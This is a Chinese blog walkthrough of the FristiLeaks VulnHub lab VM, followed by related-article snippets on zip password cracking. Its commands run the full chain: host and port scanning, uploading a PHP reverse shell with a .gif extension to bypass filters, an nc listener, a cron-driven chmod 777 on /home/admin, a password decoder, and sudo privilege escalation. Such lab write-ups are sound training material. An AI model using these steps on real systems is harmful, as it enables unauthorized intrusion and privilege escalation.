Fristileaks

已于 2024-09-18 20:47:56 修改
阅读量873 收藏 19
点赞数 9
文章标签: 网络安全
于 2024-09-18 20:31:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142342929
版权

将靶机网络改为NAT模式,并对MAC 地址进行编辑

08:00:27:A5:A6:76

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -T4 -sT -O 192.168.215.201 -p-

浏览器访问

F12 也没发现什么

目录扫描

查看robots.txt 访问这三个目录

提示这不是url

尝试在url后面加上 fristi 进入一个登录页面

F12 发现用户名 eezeepz 不过密码是加密的 尝试破解一下

touch 1.txt # 创建一个1.txt

vi 1.txt # 将密文放进去

base64 -d 1.txt > reult.txt

cat reult.txt # 发现一个是图片形式

base64 -d 1.txt > reult.png # 从新解密成png形式

成功得到密码 keKkeKKeKKeKkEkkEk

我们得到了 用户 : eezeepz 密码 keKkeKKeKKeKkEkkEk

尝试登录一手

成功登录

点击 upload file ,能上传文件

反弹shell

在kali构造反弹shell

locate php-reverse

cp /usr/share/laudanum/php/php-reverse-shell.php .

vim php-reverse-shell.php

编辑 shell.php ip 是kali

开启监听

nc -lvvp 8888

上传反弹木马文件抓包后添 .gif

上传成功,并得到上传文件所在的目录 /uploads

访问刚刚上传的文件目录 /fristi/uploads/php-reverse-shell.php.gif

成功反弹到shell

提权

ls -l

cd /home

ls -l

cd eezeepz # 切换到登录的用户目录看有什么文件

ls -l

我们发现有一个notes.txt 查看一下

cat notes.txt

作者说要回到/tmp目录并创建runthis文件

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" >/tmp/runthis

创建runthis

创建成功,接下来看admin目录

cd /home/admin

ls -l

有四个值得我们注意的文件,cronjob.py是加载命令的py文件,加密代码cryptpass.py,另外两个TXT文档是加密后的代码

编辑一个1.py ,输入以下代码

import base64,codecs,sys
def decodeString(str):
    base64Str=codecs.decode(str,'rot13')
    return base64.b64decode(base64Str[::-1])
print(decodeString(sys.argv[1]))

成功破解出密码,

whoisyourgodnow.txt对应的是 LetThereBeFristi!

cryptedpass.txt解密对应 thisisalsopw123

切换用户账户试试

su - fristigod

遇到这种情况输入

python -c 'import pty;pty.spawn("/bin/bash")'

回车

su fristigod

LetThereBeFristi! # 密码

ls -al

我们会发现一个历史文件打开看看

cat .bash_history

可以得出 "fristigod”用户一直用sudo来执行命令,我们也模仿前面bash命令执行历史里面的命令尝试生成shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功

Gigity123
关注
(Vulnhub练习)-- fristileaks渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-26 507
(Vulnhub练习)-- fristileaks渗透实战 下载地址 http://www.vulnhub.com/entry/fristileaks-13,133/ 目标主机IP:192.168.100.155 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null if [ $? -eq 0 ] ; then echo "$ip is
【Python实战之暴力破解】Python实现Zip文件的暴力破解
量化Mike
01-10 2269
Python实现Zip文件的暴力破解 zip 文件是加密的,或者忘掉自己压缩后的密码(一想到就头疼)。这时候我们就会想办法,将里面的内容提取出来。我目前已知的破解 zip 的方式只有 “Known plaintext attack(已知明文攻击)” 和 “暴力破解”。由于 “Known plaintext attack” 也有比较大的局限性 一、引入第三方库 1、zipfile zipfile 模块是 python 中自带的模块,提供了对 zip 文件的创建读、写、追加、解压以及列出 zip 文件列表的工具
zip非暴力破解
热门推荐
cackeme的专栏
08-22 1万+
大家最熟悉的zip破解方式应该是暴力破解,暴力破解有很大局限性,如果密码很长很复杂你很可能一辈子都破解不出来。由于今天要破解自己以前加密过的zip文件,我设的密码习惯性长而复杂,果断放弃暴力破解,在网上找到一篇文章http://bbs.csdn.net/topics/10444536,我才知道有另外一种破解方法,前提是你拥有加密压缩包里的任意一个文件,一般我们可以根据winrar查看拥有的文件名和
压缩包密码破解-PkCrack(明文攻击)
refire
11-15 1万+
一、压缩包破解方法 压缩包加密,密码忘记。破解办法就两种:1、暴力破解 2、明文攻击。剩下的就是找工具了。 1、暴力破解 密码挨个尝试 常用工具:ARCHPR 4.53、Bandizip专业版 原理:生成密码字典,暴力尝试。 速度:与密码长度、系统性能有关 2、明文攻击 该攻击是已知的纯文本攻击,这意味着您必须知道部分加密数据才能破解密码。 比如:加密压缩包中有10张图片,其中1张图片你有未加密的源文件。 常用工具:ARCHPR 4.53、PkCrack 原理:明文攻击是一种较为高效的攻击手段,大致
使用pkcrack明文方式破解zip压缩文件密码
qq_33265520的博客
11-25 6005
使用场景 一般破解加密压缩文件常规的方式主要有穷举、字典破解等方法。穷举破解的方式效率太低,字典破解需要碰运气。但是如果手上刚好有加密zip中的某个文件时,可以使用明文破解。这种方式利用了加密算法的BUG,相比穷举,能提高破解效率。但是有一个限制:我们把所持有的文件暂且成为明文文件(plaintext),该文件的大小必须大于12Byte 环境 Ubuntu 20.04LTS 字符集 字符集需要注意的有3点: 系统使用的字符集 压缩文件使用的字符集 终端(Terminal)使用的字符集 一般windows
PlaintextAttack
qq_39536716的博客
04-24 744
Zip明文攻击明文攻击zip加密文件的三种破解方式破解过程 明文攻击 明文攻击是一种较为高效的攻击手段,大致原理是当你不知道一个zip的密码,但是你有一个zip里面的已经知道的文件或者已经通过其他手段知道zip加密文件中的某些内容的时候,因为同一个zip压缩包里面的所有文件都是使用同一个加密的密钥来加密的,所以可以利用已知文件来找加密的密钥,利用密钥来解锁其他加密文件。一般不知道密码的具体长度以及...
FristiLeaks靶机
m0_61995767的博客
07-30 654
FristiLeaks打靶记录
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1117
FristiLeaks_1.3#攻略
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1000
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
靶机渗透测试实战(七)——FristiLeaks渗透实战
橘子女侠
05-11 3942
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面,IP地址为:192.168.37.146; 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80...
靶机渗透(六)FristiLeaks
qq_42180996的博客
04-30 1617
靶机FristiLeaks 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页 2.目录扫描(dirb) 3.浏览目录 4.Keep calm and drink fristi ...
网站爬虫太多影响正常访问,网站后端设置的小建议
惠惠软件
03-12 554
直接过滤 spider/robots 的IP 段。
压缩包密码破解工具-ARCHPR
refire
11-25 1万+
ARCHPR是一款强大又专业的密码恢复工具,软件主要是用于解密RAR压缩包的密码,它能够帮助用户轻松的解锁各种带有密码的压缩包文件。
rar和zip文件加密的破解
fback的专栏
01-31 2578
下的压缩文件,偶尔会是加密的,网上很多暴力破解软件,但只要密码是个简单网址,包括“/”、“:”“.”等符号,至少长度也8位以上,基本就破解不了了。 后来找到了arar(Advanced RAR Repair)软件,原本是用于受损rar文件的修复,但完全可以解压缩有密码的rar文件。解视频文件好用过,但是其他文件解出来要不就是0字节,要不就是乱码,还是不能用。   加密的zip文件,可以用如下
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
最新发布
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值